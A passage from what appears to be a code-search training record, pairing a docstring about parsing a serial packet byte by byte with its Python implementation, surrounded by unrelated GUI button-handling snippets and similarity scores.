= 13)\n button.update()\n button.draw(screen)\n\n button = Button('or build a new one!','' ,(122,33,38),1050, 610, 150, 30,font_size = 13)\n button.update()\n button.draw(screen)\n\n button = Button('','' ,(122,33,38),1050, 640, 150, 40,font_size = 18)\n button.update()\n button.draw(screen)\n\n button = Button('ok','' ,(22,143,78),1100, 642, 40, 30,font_size = 16)\n button.update()\n button.draw(screen)", "def build_deck_screen_stable_button_display(screen, buttons,screen_status,button_status):\n # button1 = Button('Back','build_deck_screen', (0,0,0),0, 0, 50, 50)\n # button1.update()\n # button1.draw(screen)\n button2 = Button('Save','build_deck_screen', (250,250,250),1150, 0, 50, 50, font_color = (0,0,0), alpha = 150)\n button2.update()\n button2.draw(screen)\n button3 = Button('Build your deck by picking 40 cards below: ', 'build_deck_screen', (250,250,250),300, 0, 600, 50, font_color = (0,0,0), alpha = 150)\n button3.update()\n button3.draw(screen)\n if button_status.build_deck_screen_stable_button_backend:\n buttons.extend((button2, button3))\n button_status.build_deck_screen_stable_button_backend = False", "def click(self):\r\n pass", "def add_button_clicked(self, obj):\n note = Note()\n if self.notetype :\n note.set_type(self.notetype)\n try:\n from .. import EditNote\n EditNote(self.dbstate, self.uistate, self.track, \n note, self.add_callback,\n self.callertitle, extratype = [self.notetype])\n except WindowActiveError:\n pass", "def OnButton(self, event):\r\n \r\n button = event.GetInt()\r\n\r\n if button == AUI_BUTTON_LEFT or button == AUI_BUTTON_RIGHT:\r\n if button == AUI_BUTTON_LEFT:\r\n if self.GetTabOffset() > 0:\r\n \r\n self.SetTabOffset(self.GetTabOffset()-1)\r\n self.Refresh()\r\n self.Update()\r\n else:\r\n self.SetTabOffset(self.GetTabOffset()+1)\r\n self.Refresh()\r\n self.Update()\r\n \r\n elif button == AUI_BUTTON_WINDOWLIST:\r\n idx = self.GetArtProvider().ShowDropDown(self, self._pages, self.GetActivePage())\r\n \r\n if idx != -1:\r\n \r\n e = AuiNotebookEvent(wxEVT_COMMAND_AUINOTEBOOK_PAGE_CHANGING, self.GetId())\r\n e.SetSelection(idx)\r\n e.SetOldSelection(self.GetActivePage())\r\n e.SetEventObject(self)\r\n self.GetEventHandler().ProcessEvent(e)\r\n \r\n else:\r\n event.Skip()", "def __place_main_buttons(self):\n\n #load the images and the locations\n base_x = self.__main_buttons_coords[\"x\"]\n base_y = self.__main_buttons_coords[\"y\"]\n self.__exit_btn_img = ImageTk.PhotoImage(PIL.Image.open(r\"Images server\\exit btn.png\"))\n self.__kick_all_passengers_img = ImageTk.PhotoImage(PIL.Image.open(r\"Images server\\kick people btn.png\"))\n self.__kick_all_buses_btn_img = ImageTk.PhotoImage(PIL.Image.open(r\"Images server\\kick buses btn.png\"))\n #create the button objects and set their settings to match the desgin\n self.__kick_buses_btn = Button(self.__main_window, image=self.__kick_all_buses_btn_img, command=lambda: self.__bus_controller.kick_all_buses(reason=\"kicked all buses by the console\"), borderwidth=0, background = \"#000000\", activebackground = \"#083417\")\n self.__kick__all_passengers_btn = Button(self.__main_window, image=self.__kick_all_passengers_img,command = lambda:self.__telegram_controller.kick_all_passengers(\"kicked all users from console\"), borderwidth=0, background = \"#000000\", activebackground = \"#083417\")\n self.__exit_button = Button(self.__main_window, command=self.__stop, image=self.__exit_btn_img, borderwidth=0, background = \"#000000\", activebackground = \"#B91D1D\")\n #place the buttons on the screen\n self.__kick__all_passengers_btn.place(x=base_x, y=base_y)\n self.__exit_button.place(x=base_x+210, y=base_y+133)\n self.__kick_buses_btn.place(x=base_x + 210, y=base_y)", "def on_pushButton_10_clicked(self):\n # TODO: not implemented yet\n raise NotImplementedError", "def add_button(self, first_run = False):\n if cf.music_on is True:\n m = 'Off'\n if first_run is False:\n cf.start_music('spoopy.wav')\n elif cf.music_on is False:\n m = 'On'\n if first_run is False:\n cf.stop_music()\n x = PygameUI.Button('Turn Music '+m,self.click_music)\n x.frame = pygame.Rect(0, 100, 270, 30)\n self.scene.add_child(x)\n w = x.frame.w\n xoff = cf.surface.get_rect().centerx-w/2\n x.frame = pygame.Rect(xoff, 100, 270, 30)\n self.toggle_button_el = x", "def add_play_btn(self):\n self.play_btn = QPushButton(\"Play Playlist\")\n self.play_btn.clicked.connect(self.play_btn_push)\n self.hbtnbox.addWidget(self.play_btn)", "def run_button(self):\r\n self.step = False # Clear step command\r\n self.is_pause = False\r\n self.run_command()", "def addButtons(self):\r\n profbox()\r\n if self.buttonsGroupBox != None:\r\n self.layout.removeWidget(self.buttonsGroupBox)\r\n self.buttonsGroupBox.deleteLater()\r\n self.buttonsGroupBox = None\r\n self.buttonsGroupBox = qt.QGroupBox()\r\n self.buttonsGroupBox.setTitle('Manage Needles')\r\n self.layout.addRow(self.buttonsGroupBox)\r\n self.buttonsGroupBoxLayout = qt.QFormLayout(self.buttonsGroupBox)\r\n\r\n modelNodes = slicer.util.getNodes('vtkMRMLModelNode*')\r\n for modelNode in modelNodes.values():\r\n if modelNode.GetAttribute(\"segmented\") == \"1\":\r\n i = int(modelNode.GetAttribute(\"nth\"))\r\n buttonDisplay = qt.QPushButton(\"Hide \" + self.option[i])\r\n buttonBentDisplay = qt.QPushButton(\"Hide Bent \" + self.option[i])\r\n buttonDisplay.checkable = True\r\n buttonBentDisplay.checkable = True\r\n\r\n if modelNode.GetDisplayVisibility() == 0:\r\n buttonDisplay.setChecked(1)\r\n\r\n buttonDisplay.connect(\"clicked()\", lambda who=i: self.displayNeedle(who))\r\n buttonBentDisplay.connect(\"clicked()\", lambda who=i: self.displayBentNeedle(who))\r\n buttonReformat = qt.QPushButton(\"Reformat \" + self.option[i])\r\n buttonReformat.connect(\"clicked()\", lambda who=i: self.reformatSagittalView4Needle(who))\r\n widgets = qt.QWidget()\r\n hlay = qt.QHBoxLayout(widgets)\r\n hlay.addWidget(buttonDisplay)\r\n hlay.addWidget(buttonBentDisplay)\r\n hlay.addWidget(buttonReformat)\r\n self.buttonsGroupBoxLayout.addRow(widgets)", "def create_widgets(self):\n self.Hi = Button(self, text= \"hi\", fg=\"red\", command=self.say_hi)\n self.Hi.pack({\"side\": \"left\"})\n # quit with out () means return not call\n self.Quit = Button(self, text=\"Goodbye\", fg=\"blue\", command=self.quit)\n self.Quit.pack({\"side\": \"left\"})", "def button_box(self):\r\n\r\n below_hz_frame = tkinter.Frame(self)\r\n ok_button = ttk.Button(below_hz_frame, text=\"OK\",\r\n width=10, command=self.ok,\r\n default=tkinter.ACTIVE)\r\n ok_button.grid(row=0, column=0, padx=30, pady=10)\r\n cancel_button = ttk.Button(below_hz_frame, text=\"Cancel\", width=10,\r\n command=self.cancel)\r\n cancel_button.grid(row=0, column=1, padx=30, pady=10)\r\n\r\n # bind 'ok' method to the 'enter' button of the keyboard\r\n self.bind(\"<Return>\", self.ok)\r\n\r\n # bind 'cancel' method to the 'esc' button of the keyboard\r\n self.bind(\"<Escape>\", self.cancel)\r\n below_hz_frame.pack(fill=tkinter.X)", "def addButtons(self):\n profbox()\n if self.buttonsGroupBox != None:\n self.layout.removeWidget(self.buttonsGroupBox)\n self.buttonsGroupBox.deleteLater()\n self.buttonsGroupBox = None\n self.buttonsGroupBox = qt.QGroupBox()\n self.buttonsGroupBox.setTitle( 'Manage Needles' )\n self.layout.addRow( self.buttonsGroupBox )\n self.buttonsGroupBoxLayout = qt.QFormLayout( self.buttonsGroupBox )\n \n modelNodes = slicer.util.getNodes('vtkMRMLModelNode*')\n for modelNode in modelNodes.values():\n if modelNode.GetAttribute(\"segmented\") == \"1\":\n i = int(modelNode.GetAttribute(\"nth\"))\n buttonDisplay = qt.QPushButton(\"Hide \"+self.option[i])\n buttonBentDisplay = qt.QPushButton(\"Hide Bent \"+self.option[i])\n buttonDisplay.checkable = True\n buttonBentDisplay.checkable = True\n\n if modelNode.GetDisplayVisibility() ==0:\n buttonDisplay.setChecked(1)\n\n buttonDisplay.connect(\"clicked()\", lambda who=i: self.displayNeedle(who))\n buttonBentDisplay.connect(\"clicked()\", lambda who=i: self.displayBentNeedle(who))\n buttonReformat = qt.QPushButton(\"Reformat \"+self.option[i])\n buttonReformat.connect(\"clicked()\", lambda who=i: self.reformatNeedle(who))\n widgets = qt.QWidget()\n hlay = qt.QHBoxLayout(widgets)\n hlay.addWidget(buttonDisplay)\n hlay.addWidget(buttonBentDisplay)\n hlay.addWidget(buttonReformat)\n self.buttonsGroupBoxLayout.addRow(widgets)", "def execPushButton(self):\n\t\t# verbose.detail(\"%s %s\" %(self.sender().objectName(), self.sender().property('exec')))\n\t\tprint(\"%s %s\" %(self.sender().objectName(), self.sender().property('exec')))", "def on_continue_button(self, event):\n text = _(u\"Continue button pressed.\")\n if self.state == 0:\n self.canvas_2d.render(text)\n else:\n self.canvas_3d.render()\n self.continue_command()", "def button(msg, font_size, x, y, w, h, color, action):\r\n mouse = pygame.mouse.get_pos() # Grabbing cursor position\r\n click = pygame.mouse.get_pressed() # Mouse button status\r\n \r\n # Check if cursor is on the button\r\n if x + w > mouse[0] > x and y + h > mouse[1] > y:\r\n # Draw the button\r\n pygame.draw.rect(display, color, (x, y, w, h)) \r\n \r\n # Check if we have clicked on the button\r\n if click[0] == 1 and action is not None:\r\n \r\n # Run singleplayer mode\r\n if action == \"Play S\": \r\n mode = \"singleplayer\" # set mode\r\n ctf.ctf_game(mode, selected_map)\r\n \r\n # Run multiplayer mode\r\n if action == \"Play M\":\r\n mode = \"multiplayer\" # set mode\r\n ctf.ctf_game(mode, selected_map)\r\n \r\n # Quit\r\n if action == \"Quit\":\r\n pygame.quit()\r\n quit()\r\n \r\n # Demo\r\n if action == \"Demo\":\r\n mode = \"demo\"\r\n ctf.ctf_game(mode, selected_map)\r\n \r\n # set display\r\n pygame.display.set_mode((display_width, display_height), pygame.RESIZABLE)\r\n \r\n # Displaying text on the button\r\n font = pygame.font.Font('freesansbold.ttf', font_size)\r\n text_surf, text_rect = text_objects(msg, font)\r\n text_rect.center = ((x+(w/2)), (y+(h/2)))\r\n display.blit(text_surf, text_rect)", "def help_menu_about_activate(self, widget, data=None):\n print \"cmon\"\n button1 = gtk.Button(\"Press Me!\")\n self.fixed1.put(button1, 0, 0)\n button1.window.raise_()\n button1.show()\n button2 = gtk.Button(\"Prease Press Me!\")\n self.fixed1.put(button2, 380, 380)\n button2.show()\n button2.window.raise_()", "def add_next_ui_button(self, label: str, function: Union[Callable, str]):\n\n def on_click(_: ControlEvent):\n self._callbacks.queue_fn_or_kw(function, self._get_results())\n\n button = ElevatedButton(label, on_click=on_click)\n self._client.add_element(button)\n self._client.add_to_disablelist(button)", "def draw_buttons(screen):\r\n for button in start_buttons: # goes through every start button\r\n if button.active:\r\n button.draw(screen) # shows the button\r\n for button in end_buttons: # goes through every start button\r\n if button.active:\r\n button.draw(screen) # shows the button\r\n for onewriting in button_writings_start: # goes through every start writing\r\n if onewriting.active:\r\n onewriting.draw(screen, True) # shows the writing\r\n for onewriting in button_writings_end: # goes through every in game writing\r\n if onewriting.active:\r\n onewriting.draw(screen, True) # shows the writing\r", "def set_controls(self):\n # Image control\n image = pyxbmct.Image(addonfolder+artsfolder+'/osc.png')\n self.placeControl(image, 0, 0, rowspan=8, columnspan=16)\n\n\t\t# Label information\n image = pyxbmct.Image(addonfolder+artsfolder+'/users.png')\n self.placeControl(image, 8, 1, rowspan=1, columnspan=14)\n\t\t\n\t\t# Username input\n image = pyxbmct.Image(addonfolder+artsfolder+'/username.png')\n self.placeControl(image, 10, 1, rowspan=1, columnspan=3)\n self.username_input = pyxbmct.Edit('')\n self.placeControl(self.username_input, 10, 4, rowspan=1, columnspan=4)\n self.username_input.setText('oscam')\n\t\t\n\t\t# Password input\n image = pyxbmct.Image(addonfolder+artsfolder+'/password.png')\n self.placeControl(image, 11, 1, rowspan=1, columnspan=3)\n self.password_input = pyxbmct.Edit('', isPassword=True)\n self.placeControl(self.password_input, 11, 4, rowspan=1, columnspan=4)\n self.password_input.setText('oscam')\n\t\t\n\t\t# Port input\n image = pyxbmct.Image(addonfolder+artsfolder+'/port.png')\n self.placeControl(image, 12, 1, rowspan=1, columnspan=3)\n self.port_input = pyxbmct.Edit('')\n self.placeControl(self.port_input, 12, 4, rowspan=1, columnspan=4)\n self.port_input.setText('8888')\n\t\t\n\t\t# Next button\n self.next_button = pyxbmct.Button('Next')\n self.placeControl(self.next_button, 13, 14, rowspan=1, columnspan=1)\n # Connect close button\n self.connect(self.next_button, lambda: self.page())\n\t\t\n\t\t# Close button\n self.close_button = pyxbmct.Button('Exit')\n self.placeControl(self.close_button, 13, 15, rowspan=1, columnspan=1)\n self.connect(self.close_button, lambda: self.closepage())", "def configure_widgets(self):\r\n\r\n # 'command' - callback function executed when button is pressed\r\n # since we can't pass it a function with arguments, we use the partial \r\n # function from the functools module\r\n self.btn_tl['command'] = partial(self.play, \"x\", (0,0))\r\n self.btn_tm['command'] = partial(self.play, \"x\", (0,1))\r\n self.btn_tr['command'] = partial(self.play, \"x\", (0,2))\r\n self.btn_ml['command'] = partial(self.play, \"x\", (1,0))\r\n self.btn_mm['command'] = partial(self.play, \"x\", (1,1))\r\n self.btn_mr['command'] = partial(self.play, \"x\", (1,2))\r\n self.btn_bl['command'] = partial(self.play, \"x\", (2,0))\r\n self.btn_bm['command'] = partial(self.play, \"x\", (2,1))\r\n self.btn_br['command'] = partial(self.play, \"x\", (2,2))\r\n\r\n self.btn_reset['text'] = \"Reset\"\r\n self.btn_reset['command'] = self.reset", "def set_navigation(self):\n self.close_button.controlUp(self.nos_button)\n self.nos_button.controlDown(self.madeira_button)\n self.nos_button.controlRight(self.nowo_button)\n self.nowo_button.controlDown(self.madeira_button)\n self.nowo_button.controlLeft(self.nos_button)\n self.madeira_button.controlUp(self.nos_button)\n self.madeira_button.controlDown(self.close_button)\n\t # Set initial focus.\n self.setFocus(self.close_button)", "def set_controls(self):\n # Image control\n image = pyxbmct.Image(addonfolder+artsfolder+'/tvh.png')\n self.placeControl(image, 0, 0, rowspan=8, columnspan=17)\n\n\t\t# Wetek Button\n self.wetek_button = pyxbmct.RadioButton('')\n self.placeControl(self.wetek_button, 9, 1, rowspan=3, columnspan=3)\n self.connect(self.wetek_button, self.wetek_button_update)\n if tools.return_data('TVHWIZARD', 'STRING', 'wetek', 2) == 1:\n self.wetek_button.setSelected(True)\n else:\n self.wetek_button.setSelected(False)\n wetek = pyxbmct.Image(addonfolder+artsfolder+'/weteksmall.png')\n self.placeControl(wetek, 9, 1, rowspan=3, columnspan=3)\n\n\t\t# K Button\n self.k_button = pyxbmct.RadioButton('')\n self.placeControl(self.k_button, 9, 5, rowspan=3, columnspan=3)\n self.connect(self.k_button, self.k_button_update)\n if tools.return_data('TVHWIZARD', 'STRING', 'k', 2) == 1:\n self.k_button.setSelected(True)\n else:\n self.k_button.setSelected(False)\n k = pyxbmct.Image(addonfolder+artsfolder+'/ksmall.png')\n self.placeControl(k, 9, 5, rowspan=3, columnspan=3)\n\n\t\t# Khadas Button\n self.khadas_button = pyxbmct.RadioButton('')\n self.placeControl(self.khadas_button, 9, 9, rowspan=3, columnspan=3)\n self.connect(self.khadas_button, self.khadas_button_update)\n if tools.return_data('TVHWIZARD', 'STRING', 'khadas', 2) == 1:\n self.khadas_button.setSelected(True)\n else:\n self.khadas_button.setSelected(False)\n khadas = pyxbmct.Image(addonfolder+artsfolder+'/khadasmall.png')\n self.placeControl(khadas, 9, 9, rowspan=3, columnspan=3)\n\n\t\t# Generic Button\n self.generic_button = pyxbmct.RadioButton('')\n self.placeControl(self.generic_button, 9, 13, rowspan=3, columnspan=3)\n self.connect(self.generic_button, self.generic_button_update)\n if tools.return_data('TVHWIZARD', 'STRING', 'generic', 2) == 1:\n self.generic_button.setSelected(True)\n else:\n self.generic_button.setSelected(False)\n generic = pyxbmct.Image(addonfolder+artsfolder+'/genericsmall.png')\n self.placeControl(generic, 9, 13, rowspan=3, columnspan=3)\n\t\t\n\t\t# Close button\n self.close_button = pyxbmct.Button('Exit')\n self.placeControl(self.close_button, 13, 16, rowspan=1, columnspan=1)\n self.connect(self.close_button, lambda: self.closepage())", "def display(self, color = (190,205,205), add = False):\r\n\t\tpass", "def build_deck_screen_my_deck_button_display(screen,buttons, screen_status, button_status, card_database_filter, user):\n local_store_list = build_deck_screen_my_deck_card_list_refine(user)\n #character number display\n if user.character_card == '':\n button1 = Button('Character: 0/1','' ,(250,250,250),50, 560, 150, 30, font_color = (255,60,60), alpha = 150)\n else:\n button1 = Button('Character: 1/1','' ,(250,250,250),50, 560, 150, 30, font_color = (0,0,0), alpha = 150)\n button1.update()\n button1.draw(screen)\n #card number display\n if len(user.deck_list) >= 40:\n button2 = Button('Total: ' + str(len(user.deck_list)) + '/40','' ,(250,250,250),620, 560, 100, 30,font_color = (0,0,0), alpha = 150)\n else:\n button2 = Button('Total: ' + str(len(user.deck_list)) + '/40','' ,(250,250,250),620, 560, 100, 30, font_color = (255,60,60), alpha = 150)\n button2.update()\n button2.draw(screen)\n\n # Page forward button\n button3 = Button('>','', (250,250,250),1110,650, 30, 30, font_color = (0,0,0), alpha = 150)\n # Edge cases when len() = 14,28,42 ...\n if len(local_store_list) % 6 == 0 and len(local_store_list) != 0:\n if screen_status.build_deck_screen_my_deck_page_id != ((len(local_store_list))//6): # Make sure on the last page no foreward button shows up\n button3.update()\n button3.draw(screen)\n # Normal cases\n else:\n if screen_status.build_deck_screen_my_deck_page_id != ((len(local_store_list))//6 + 1): # Make sure on the last page no foreward button shows up\n button3.update()\n button3.draw(screen)\n # Page backward button\n button4 = Button('<','', (250,250,250),210,650, 30, 30, font_color = (0,0,0), alpha = 150)\n if screen_status.build_deck_screen_my_deck_page_id != 1: # Make sure on the first page no backward button shows up\n button4.update()\n button4.draw(screen)\n\n if button_status.build_deck_screen_my_deck_button_backend:\n buttons.extend((button3,button4))\n button_status.build_deck_screen_my_deck_button_backend = False", "def create_buttons(grid_display, text_color, outline_color, screen_width, screen_height):\n\n all_button = []\n\n # create font used inside the buttons\n button_font = pygame.font.SysFont(\"monospace\", screen_width / 20)\n\n # help button\n temp_font = button_font.render(\"test\", 1, text_color)\n center_text = temp_font.get_rect()\n center_text.centery = screen_height * .75\n center_text.width = screen_width * .5\n center_text.centerx = screen_width * .5\n help_button = Button(center_text.copy(), \"Help\", text_color, outline_color, button_font)\n all_button.append(help_button)\n\n # 1 player button\n center_text.left = screen_width * .27\n center_text.width = screen_width * .12\n center_text.top = screen_height * .5\n center_text.height = screen_height * .1\n one_button = Button(center_text.copy(), \"1\", text_color, outline_color, button_font)\n all_button.append(one_button)\n\n # 2 player button\n center_text.left = screen_width * .44\n two_button = Button(center_text.copy(), \"2\", text_color, outline_color, button_font)\n all_button.append(two_button)\n\n # 3 player button\n center_text.left = screen_width * .6\n three_button = Button(center_text.copy(), \"3\", text_color, outline_color, button_font)\n all_button.append(three_button)\n\n # back button\n center_text.width = screen_width * .25\n center_text.centerx = grid_display.get_rect().centerx\n center_text.centery = screen_height * .8\n back_button = Button(center_text.copy(), \"Back\", text_color, outline_color, button_font)\n all_button.append(back_button)\n\n # continue button\n center_text.centery = screen_height * .62\n center_text.centerx = screen_width * .5\n pause_button = Button(center_text.copy(), \"Continue\", text_color, outline_color, button_font)\n all_button.append(pause_button)\n\n # reset button\n center_text.centery = screen_height * .75\n center_text.centerx = screen_width * .5\n reset_button = Button(center_text.copy(), \"Reset\", text_color, outline_color, button_font)\n all_button.append(reset_button)\n\n # return to menu button\n center_text.centery = screen_height * .88\n center_text.centerx = screen_width * .5\n back_to_menu_button = Button(center_text.copy(), \"Menu\", text_color, outline_color, button_font)\n all_button.append(back_to_menu_button)\n\n return all_button", "def HandButton(self, event):\n pass", "def update_navigation_buttons(self):\n test = self.artist_list.currentIndex() # .row()\n self.prev_artist_button.setEnabled(True)\n self.next_artist_button.setEnabled(True)\n if test == 0:\n self.prev_artist_button.setEnabled(False)\n if test == len(self.c_artists) - 1:\n self.next_artist_button.setEnabled(False)\n self.focus_albums()", "def _clicked_yes_button(self):\n self.yes = True", "def OnButton(self, event):\n button = event.GetEventObject().GetName()\n if button == \"Button1\":\n self.OnButton1()\n elif button == \"Button2\":\n self.OnButton2()\n elif button == \"Button3\":\n self.OnExit(event)", "def setupButtons(self):\n self.addLayerButton.setAccessibleName('editLayer')\n self.addLayerButton.setText('+')\n self.deleteLayerButton.setAccessibleName('editLayer')\n self.deleteLayerButton.setText('-')\n self.downButton.setArrowType(QtCore.Qt.DownArrow)\n self.upButton.setArrowType(QtCore.Qt.UpArrow)\n self.addLayerButton.setToolTip('Add a new Layer to the Job.')\n self.deleteLayerButton.setToolTip('Delete the selected Layer from the Job.')\n self.downButton.setToolTip('Move the selected Layer down in the Job.')\n self.upButton.setToolTip('Move the selected Layer up in the Job.')", "def set_navigation(self):\n self.close_button.controlUp(self.wetek_button)\n self.wetek_button.controlDown(self.close_button)\n self.wetek_button.controlRight(self.k_button)\n self.k_button.controlRight(self.khadas_button)\n self.k_button.controlDown(self.close_button)\n self.khadas_button.controlRight(self.generic_button)\n self.khadas_button.controlDown(self.close_button)\n self.generic_button.controlLeft(self.khadas_button)\n self.generic_button.controlDown(self.close_button)\n self.k_button.controlLeft(self.wetek_button)\n self.khadas_button.controlLeft(self.k_button)\n\t # Set initial focus.\n self.setFocus(self.close_button)" ]
[ "0.68849444", "0.68576396", "0.6849067", "0.65670127", "0.65635157", "0.65260524", "0.6473985", "0.6426153", "0.640084", "0.64003897", "0.63505423", "0.6331861", "0.6318083", "0.62580913", "0.6250697", "0.62376004", "0.6207637", "0.6195303", "0.61879086", "0.61741465", "0.61739594", "0.61710924", "0.6169308", "0.6162893", "0.61531526", "0.6153051", "0.61524606", "0.6138895", "0.60758525", "0.6066102", "0.6059723", "0.6029175", "0.6023824", "0.60230297", "0.6022224", "0.6006147", "0.6006147", "0.59911346", "0.5990742", "0.597804", "0.59725004", "0.59612113", "0.5959111", "0.5957306", "0.59540576", "0.5943332", "0.59245723", "0.5922853", "0.59181005", "0.5912712", "0.5909775", "0.5907343", "0.5904873", "0.5903148", "0.5896391", "0.58958817", "0.58958554", "0.5890727", "0.5886544", "0.58816606", "0.5881556", "0.587772", "0.5876329", "0.5863843", "0.5860866", "0.585946", "0.58572286", "0.58473706", "0.58410525", "0.58358294", "0.583331", "0.5830904", "0.58279824", "0.58268595", "0.5826752", "0.5823246", "0.5813552", "0.58108467", "0.5805831", "0.58009744", "0.58005494", "0.5790054", "0.5774448", "0.57678545", "0.57513124", "0.5749569", "0.57484597", "0.57481164", "0.57468355", "0.5744017", "0.5743129", "0.57430464", "0.5740569", "0.5739816", "0.57394975", "0.5735447", "0.5734281", "0.57291853", "0.57271695", "0.5717005", "0.57163674" ]
0.0
-1
Runs a single byte through the packet parsing state amchine. Returns NOT_DONE if the packet is incomplete. Returns SUCCESS is the packet was received successfully. Returns CHECKSUM if a checksum error is detected.
def process_byte(self, byte): if self.index == -1: if byte == 0xff: self.index = 0 self.checksum = 0 elif self.index == 0: if byte != 0xff: self.checksum += byte self.pkt_bytes[0] = byte self.index += 1 else: self.checksum += byte self.pkt_bytes[self.index] = byte self.index += 1 if self.index == 7: # packet complete self.index = -1 if self.checksum & 0xff != 0xff: return CommanderRx.CHECKSUM self.lookv = self.pkt_bytes[0] - 128 # 0 - 255 ==> -128 - 127 self.lookh = self.pkt_bytes[1] - 128 self.walkv = self.pkt_bytes[2] - 128 self.walkh = self.pkt_bytes[3] - 128 self.button = self.pkt_bytes[4] self.ext = self.pkt_bytes[5] return CommanderRx.SUCCESS return CommanderRx.NOT_DONE
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def readCommand(self):\n while (True):\n time.sleep(1)\n # At least a package of 4 bytes (minimum)\n # [ Head | Length | Address | Data[0…N] | Check ]\n if (self._serial.inWaiting()>=4):\n # Gets only the first byte of the packet (it should be HEAD)\n packet_header = self._serial.read(1)\n if (packet_header != Ind903Packet.PACKET_HEAD):\n # the next one is the length of the packet\n packet_length_bytes = self._serial.read(1)\n packet_length = int.from_bytes(packet_length_bytes, byteorder='big')\n if (packet_length > 0):\n raw_packet = b\"\".join([packet_header, packet_length_bytes, self._serial.read(packet_length)]) \n result_packet = Ind903Packet.parsePacket(raw_packet)\n return (result_packet)", "def _receive_packet(self):\n report = self._serial_read(1)\n if len(report) != 1:\n self.log(\"ERROR: Didn't read back a report!\")\n report = -1\n else:\n report = report[0]\n retval = self._serial_read(1)\n if len(retval) != 1:\n self.log(\"ERROR: Didn't read back a return value!\")\n retval = -1\n else:\n retval = retval[0]\n\n return_payload_len = self._serial_read(1)\n if len(return_payload_len) != 1:\n self.log(\"ERROR: Didn't read back a return payload length!\")\n return_payload_len = 0\n else:\n return_payload_len = return_payload_len[0]\n\n if return_payload_len != 0:\n return_payload = self._serial_read(return_payload_len)\n else:\n return_payload = []\n checksum = self._serial_read(1)\n if len(checksum) != 1:\n self.log(\"ERROR: Didn't read back a checksum!\")\n checksum = -1\n else:\n checksum = checksum[0]\n\n data = self.MAGIC_HEADER + [report, retval, return_payload_len] + return_payload\n data.append(checksum)\n\n our_checksum = self.generate_checksum(data[:-1])\n if our_checksum != checksum:\n self.log(\"ERROR: Our checksum didn't calculate properly! \"\n \"(Calculated {}, expected {})\".format(our_checksum, checksum))\n return -1, checksum, []\n else:\n if self.verbose:\n self.log(\"Checksum match! ({} == {})\".format(our_checksum, checksum))\n\n return report, retval, return_payload", "def process_message(msg):\r\n print(\"received \")\r\n global bytes_in\r\n if len(msg) == 200: # is header or end\r\n print(\"found header\")\r\n msg_in = msg.decode(\"utf-8\")\r\n msg_in = msg_in.split(\",,\")\r\n print(msg_in)\r\n if msg_in[0] == \"end\": # is it really last packet?\r\n in_hash_final = in_hash_md5.hexdigest()\r\n if in_hash_final == msg_in[2]:\r\n print(\"File copied OK -valid hash \", in_hash_final)\r\n return -1\r\n else:\r\n print(\"Bad file receive \", in_hash_final)\r\n return False\r\n else:\r\n if msg_in[0] != \"header\":\r\n in_hash_md5.update(msg)\r\n return True\r\n else:\r\n return False\r\n else:\r\n bytes_in = bytes_in + len(msg)\r\n in_hash_md5.update(msg)\r\n print(\"found data bytes= \", bytes_in)\r\n return True", "def _recv(self):\n result = self._con.receive()\n if result.startswith(Parser.NOT_OK_MSG) or len(result) == 0:\n return result\n while not result.endswith(Parser.OK_MSG + '\\n') and not result.startswith(Parser.OK_MSG):\n result += self._con.receive()\n return result", "def packet_read(self):\n bytes_received = 0\n \n if self.sock == NC.INVALID_SOCKET:\n return NC.ERR_NO_CONN\n \n if self.in_packet.command == 0:\n ba_data, errnum, errmsg = nyamuk_net.read(self.sock, 1)\n if errnum == 0 and len(ba_data) == 1:\n bytes_received += 1\n byte = ba_data[0]\n self.in_packet.command = byte\n \n if self.as_broker:\n if self.bridge is None and self.state == NC.CS_NEW and (byte & 0xF0) != NC.CMD_CONNECT:\n print \"RETURN ERR_PROTOCOL\"\n return NC.ERR_PROTOCOL, bytes_received\n else:\n if errnum == errno.EAGAIN or errnum == errno.EWOULDBLOCK:\n return NC.ERR_SUCCESS, bytes_received\n elif errnum == 0 and len(ba_data) == 0 or errnum == errno.ECONNRESET:\n return NC.ERR_CONN_LOST, bytes_received\n else:\n evt = event.EventNeterr(errnum, errmsg)\n self.push_event(evt)\n return NC.ERR_UNKNOWN, bytes_received\n \n if not self.in_packet.have_remaining:\n loop_flag = True\n while loop_flag:\n ba_data, errnum, errmsg = nyamuk_net.read(self.sock, 1)\n \n if errnum == 0 and len(ba_data) == 1: \n byte = ba_data[0]\n bytes_received += 1\n self.in_packet.remaining_count += 1\n if self.in_packet.remaining_count > 4:\n return NC.ERR_PROTOCOL, bytes_received\n \n self.in_packet.remaining_length += (byte & 127) * self.in_packet.remaining_mult\n self.in_packet.remaining_mult *= 128\n else:\n if errnum == errno.EAGAIN or errnum == errno.EWOULDBLOCK:\n return NC.ERR_SUCCESS, bytes_received\n elif errnum == 0 and len(ba_data) == 0 or errnum == errno.ECONNRESET:\n return NC.ERR_CONN_LOST, bytes_received\n else:\n evt = event.EventNeterr(errnum, errmsg)\n self.push_event(evt)\n return NC.ERR_UNKNOWN, bytes_received\n \n if (byte & 128) == 0:\n loop_flag = False\n \n if self.in_packet.remaining_length > 0:\n self.in_packet.payload = bytearray(self.in_packet.remaining_length)\n if self.in_packet.payload is None:\n return NC.ERR_NO_MEM, bytes_received\n self.in_packet.to_process = self.in_packet.remaining_length\n \n self.in_packet.have_remaining = True\n \n if self.in_packet.to_process > 0:\n ba_data, errnum, errmsg = nyamuk_net.read(self.sock, self.in_packet.to_process)\n if errnum == 0 and len(ba_data) > 0:\n readlen = len(ba_data)\n bytes_received += readlen\n for idx in xrange(0, readlen):\n self.in_packet.payload[self.in_packet.pos] = ba_data[idx]\n self.in_packet.pos += 1\n self.in_packet.to_process -= 1\n else:\n if errnum == errno.EAGAIN or errnum == errno.EWOULDBLOCK:\n return NC.ERR_SUCCESS, bytes_received\n elif errnum == 0 and len(ba_data) == 0 or errnum == errno.ECONNRESET:\n return NC.ERR_CONN_LOST, bytes_received\n else:\n evt = event.EventNeterr(errnum, errmsg)\n self.push_event(evt)\n return NC.ERR_UNKNOWN, bytes_received\n\n #all data for this packet is read\n self.in_packet.pos = 0\n \n ret = self.packet_handle()\n \n self.in_packet.packet_cleanup()\n \n self.last_msg_in = time.time()\n \n return ret, bytes_received", "def do(self, command):\r\n command += xsct_line_end\r\n logger.info('Sending command: %s ...', repr(command))\r\n self.send(command)\r\n ans = self.recv()\r\n if ans.startswith('okay'):\r\n return ans[5:]\r\n if ans.startswith('error'):\r\n raise PyXilException(ans[6:])\r\n raise PyXilException('Illegal start-string in protocol. Answer is: ' + ans)", "def got_packet(self, pkt):\n self._log.debug(\"got a packet {}\".format(pkt))\n 